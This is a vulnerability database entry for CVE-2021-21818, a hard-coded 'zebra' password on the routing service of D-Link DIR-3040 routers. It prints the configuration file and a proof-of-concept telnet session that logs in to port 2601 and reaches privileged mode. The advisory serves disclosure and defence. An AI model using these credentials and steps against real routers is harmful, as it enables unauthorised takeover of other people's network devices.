Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugKnownsecSSV:99311
HistoryJul 22, 2021 - 12:00 a.m.

D-LINK DIR-3040 服务组件使用默认密码(CVE-2021-21818)

2021-07-2200:00:00
Knownsec
www.seebug.org
147

0.001 Low

EPSS

Percentile

45.1%

JSON

The DIR-3040 is an AC3000-based wireless internet router.

Zebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols.

The DIR-3040 runs this service by default on TCP port 2601 and can be accessed by anyone on the network. This service also uses a configuration file containing a hard-coded password zebra:

admin@dlinkrouter:~# cat /tmp/zebra.conf 
hostname Router
password zebra
enable password zebra

Exploit Proof of Concept

$ telnet 192.168.100.1 2601 
Trying 192.168.100.1...
  Connected to 192.168.100.1.
  Escape character is '^]'.
  
  Hello, this is Quagga (version 1.1.1).
  Copyright 1996-2005 Kunihiro Ishiguro, et al.
  
  
  User Access Verification
  
  Password: 
  Router> 
  echo      Echo a message back to the vty
  enable    Turn on privileged mode command
  exit      Exit current mode and down to previous mode
  help      Description of the interactive help system
  list      Print command list
  quit      Exit current mode and down to previous mode
  show      Show running system information
  terminal  Set terminal line parameters
  who       Display who is on vty
  Router> enable
  Password: 
  Router# 
  clear      Clear stored data
  configure  Configuration from vty interface
  copy       Copy configuration
  debug      Debugging functions (see also 'undebug')
  disable    Turn off privileged mode command
  echo       Echo a message back to the vty
  enable     Turn on privileged mode command
  end        End current mode and change to enable mode.
  exit       Exit current mode and down to previous mode
  help       Description of the interactive help system
  list       Print command list
  logmsg     Send a message to enabled logging destinations
  no         Negate a command or set its defaults
  quit       Exit current mode and down to previous mode
  show       Show running system information
  terminal   Set terminal line parameters
  who        Display who is on vty
  write      Write running configuration to memory, network, or terminal

Related

prion 1
nvd 1
cve 1
talos 1
cvelist 1
cnvd 1
openvas 1
talosblog 1
prion
prion
Hardcoded credentials
2021-07-16 11:15:00
nvd
nvd
CVE-2021-21818
2021-07-16 11:15:09
cve
cve
CVE-2021-21818
2021-07-16 11:15:09
talos
talos
D-LINK DIR-3040 Syslog information disclosure vulnerability
2021-07-15 00:00:00
cvelist
cvelist
CVE-2021-21818
2021-07-16 10:24:20
cnvd
cnvd
D-LINK DIR-3040 Trust Management Issue Vulnerability (CNVD-2021-53335)
2021-07-20 00:00:00
openvas
openvas
D-Link DIR-3040 < 1.13B03 Hotfix Multiple Vulnerabilities - Active Check
2021-08-03 00:00:00
talosblog
talosblog
The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter
2023-08-02 12:00:19

0.001 Low

EPSS

Percentile

45.1%

JSON
Related for SSV:99311
prion1nvd1cve1talos1cvelist1cnvd1openvas1talosblog1